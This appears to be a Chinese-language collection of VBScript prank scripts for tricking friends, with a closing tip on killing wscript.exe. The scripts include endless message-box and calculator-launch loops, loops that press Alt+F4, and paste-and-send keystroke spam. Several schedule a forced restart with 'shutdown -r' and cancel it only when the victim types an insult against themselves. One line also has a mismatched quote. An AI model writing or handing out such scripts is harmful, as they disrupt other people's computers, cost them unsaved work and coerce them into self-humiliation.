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1.1.一直说You are foolish!

  1. do
  2. msgbox "You are foolish!"
  3. loop



  1. set wsh=createobject("wscript.shell")
  2. do
  3. wsh.run "calc"
  4. loop


  1. Set WshShell = WScript.Createobject("WScript.Shell")
  2. for i = 1 to 100 '100可改成其他数'
  3. WScript.Sleep 1
  4. WshShell.SendKeys"^v"
  5. wshShell.SendKeys"{ENTER}"
  6. next



  1. WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName)
  2. WScript.Echo("你是可爱的小朋吗?")
  3. WScript.Echo("哈,我想你拉,这你都不知道吗?")
  4. WScript.Echo("怎么才来,说~是不是不关心我")
  5. WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
  6. WScript.Echo("小强很生气,后果很严重哦。")
  7. WScript.Echo("嘿嘿!你也会很惨滴哦")
  8. WScript.Echo("是不是想清除我?")
  9. WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
  10. WScript.Echo("还剩49下,快点点哦")
  11. WScript.Echo("还剩48下,快点,小笨蛋!")
  12. WScript.Echo("还剩47下对,就这样快点点!")
  13. WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。")
  14. WScript.Echo("还剩45下,记得要快哦!")
  15. WScript.Echo("还剩43下")
  16. WScript.Echo("还剩42下")
  17. WScript.Echo("还剩41下")
  18. WScript.Echo("还剩40下")
  19. WScript.Echo("还剩39下")
  20. WScript.Echo("还剩38下")
  21. WScript.Echo("还剩37下")
  22. WScript.Echo("还剩36下")
  23. WScript.Echo("还剩35下")
  24. WScript.Echo("还剩34下")
  25. WScript.Echo("还剩33下")
  26. WScript.Echo("还剩32下")
  27. WScript.Echo("还剩30下")
  28. WScript.Echo("还剩29下")
  29. WScript.Echo("还剩28下")
  30. WScript.Echo("还剩27下")
  31. WScript.Echo("还剩26下")
  32. WScript.Echo("还剩25下")
  33. WScript.Echo("还剩24下")
  34. WScript.Echo("还剩23下")
  35. WScript.Echo("还剩22下")
  36. WScript.Echo("还剩21下")
  37. WScript.Echo("还剩20下")
  38. WScript.Echo("还剩19下")
  39. WScript.Echo("还剩18下")
  40. WScript.Echo("还剩17下")
  41. WScript.Echo("还剩16下")
  42. WScript.Echo("还剩15下")
  43. WScript.Echo("还剩14下")
  44. WScript.Echo("还剩13下停停!!!慢点,我有话要说")
  45. WScript.Echo("还剩12下,你继续点我就会消失滴")
  46. WScript.Echo("还剩11下,以后就看不到我拉。555555")
  47. WScript.Echo("还剩10下,你现在可以选择停止!")
  48. WScript.Echo("还剩9下。你还点啊,不要我拉?")
  49. WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")
  50. WScript.Echo("还剩7下。疯了,你有点负意!")
  51. WScript.Echo("还剩6下。对。你就点吧,我恨你!")
  52. WScript.Echo("还剩5下,不明白,删除我你就好吗?")
  53. WScript.Echo("还剩4下!真要删除我?")
  54. WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
  55. WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")
  56. WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")
  57. WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")
  58. WScript.Echo("想结素我么?那你就再多点一次")
  59. WScript.Echo("想结素我么?那你就再多点一次")
  60. WScript.Echo("想结素我么?那你就再多点一次")
  61. WScript.Echo("想结素我么?那你就再多点一次")
  62. WScript.Echo("想结素我么?那你就再多点一次")
  63. WScript.Echo("想结素我么?那你就再多点一次")
  64. WScript.Echo("想结素我么?那你就再多点一次")
  65. WScript.Echo("想结素我么?那你就再多点一次")
  66. WScript.Echo("想结素我么?那你就再多点一次")
  67. WScript.Echo("想结素我么?那你就再多点一次")


  1. for i = 0 to 100 '此处100可改成其他数'
  2. msgbox "回车[滑稽]",64
  3. next


  1. do
  2. Set WshShell = WScript.Createobject("WScript.Shell")
  3. WshShell.SendKeys "%{F4}" '%代表Alt'
  4. loop



  1. a=msgbox "你是不是猪?",vbOKCancel
  2. if a = vbOK then
  3. msgbox("好一头猪!")
  4. elseif a=vbCancel then
  5. do
  6. msgbox("坏猪!")
  7. loop


  1. msgbox "你在吗",vbQuestion,"在吗"
  2. msgbox ("我借你5000块钱")
  3. msgbox ("1个月给你")
  4. msgbox ("不给,我就是PIG")
  5. dim j
  6. do while j<1
  7. Select Case msgbox("借给我好吗",68,"请郑重的回答我")
  8. Case 6 j=1
  9. Case 7 msgbox("想好了再说")
  10. end Select
  11. loop
  12. msgbox("我就知道你会同意的,哈哈哈哈")


  1. msgbox("嘿嘿,欢迎来到地狱")
  2. msgbox("阎王目睹了人世间的惨恶")
  3. msgbox("下定决心要让一些人付出代价")
  4. msgbox("你是第一个受到刑罚的人")
  5. msgbox("这里有一个问题,如果你答对了,我放你到人间,错了,你就会魂飞魄散")
  6. a=msgbox("请问天上的星星是不是无数的?",vbOKCancel)
  7. if a=vbok then
  8. msgbox("错误!星星可以数的过来")
  9. msgbox("5")
  10. msgbox("4")
  11. msgbox("3")
  12. msgbox("2”)
  13. msgbox("1")
  14. msgbox("看我!哈!(你感觉自己轻飘飘的,然后就什么也不知道了)")
  15. elseif a=vbcancel then
  16. msgbox("恭喜你回答对了")
  17. end if



  1. on error resume next
  2. dim WSHshellA
  3. set WSHshellA = wscript.createobject("wscript.shell")
  4. WSHshellA.run "cmd.exe /c shutdown -r -t 180 -c ""说我是猪,不说我是猪就一分钟关机,不信,试下···"" ",0 ,true
  5. dim a
  6. do while(a <> "我是猪")
  7. a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","",8000,7000)
  8. msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
  9. loop
  10. msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
  11. dim WSHshell
  12. set WSHshell = wscript.createobject("wscript.shell")
  13. WSHshell.run "cmd.exe /c shutdown -a",0 ,true
  14. msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,好乖"


  1. set ws=createobject("wscript.shell")
  2. call shutdown(1)
  3. do while a<>"我是猪"
  4. a=inputbox("快在下面的框框里输入我是猪,否则后果自负,快输""我是猪"" ","输不输","")
  5. loop
  6. call shutdown(2)
  7. msgbox "早说就行了嘛",4096+64
  8. msgbox"再输一遍我是猪!",4096+64
  9. msgbox"我是猪!",4096+64
  10. MsgBox"最后一次!",4096+64
  11. MsgBox"如果你很快的点过去,不看的话",4096+64
  12. MsgBox"我就要你踩我空间的!哼!",4096+64
  13. MsgBox"从前有座山!",4096+64
  14. MsgBox"山里有个庙.",4096+64
  15. MsgBox"庙里有个老和尚在讲故事.",4096+64
  16. ws.run"iexplore.exe http://new.qzone.qq.com/137841986/infocenter"
  17. msgbox"哎呀累了!数绵羊哄我睡觉",4096+64
  18. for i=1 to 100
  19. MsgBox i&"只绵羊",4096+64
  20. next
  21. msgbox"哎呀我困了,这次就饶过你吧,下次注意哦!",4096+64
  22. msgbox"最后问个问题,我是不是大好人!",4096+64
  23. if inputbox("是不是","请选择","是")<>"是" then
  24. call shutdown(1)
  25. end if
  26. sub shutdown(s)
  27. select case s
  28. case 1
  29. ws.run"cmd.exe /c shutdown -r -t 60 -c",0
  30. case 2
  31. ws.run"cmd.exe /c shutdown -a",0
  32. end select
  33. end sub

3.3 虚惊一场

  1. on error resume next
  2. dim WSHshellA
  3. set WSHshellA = wscript.createobject("wscript.shell")
  4. WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说你是傻B,我是天下第一大傻B不说宝宝,我是天下第一大傻B就一分钟关你机,不信,试试···"" ",0 ,true
  5. dim a
  6. do while(a <> "宝宝,我是天下第一大傻B")
  7. a = inputbox ("宝宝,我是天下第一大傻B,就不关机,快撒,说 ""宝宝,我是天下第一大傻B"" ","说不说","不说",8000,7000)
  8. msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
  9. loop
  10. msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,乖乖"
  11. dim WSHshell
  12. set WSHshell = wscript.createobject("wscript.shell")
  13. WSHshell.run "cmd.exe /c shutdown -a",0 ,true
  14. msgbox chr(13) + chr(13) + chr(13) + "宝宝是不是又帅啦??"

3.4 重复说一句话


  1. Set WshShell = WScript.CreateObject("WScript.Shell")
  2. for i=1 to 50 '50可改为其他的数字'
  3. WScript.Sleep 100
  4. WshShell.SendKeys "^v"
  5. WshShell.SendKeys "%s"
  6. Next



在弹出的cmd窗口中输入taskkill -f -im wscript.exe 然后回车即可关闭。

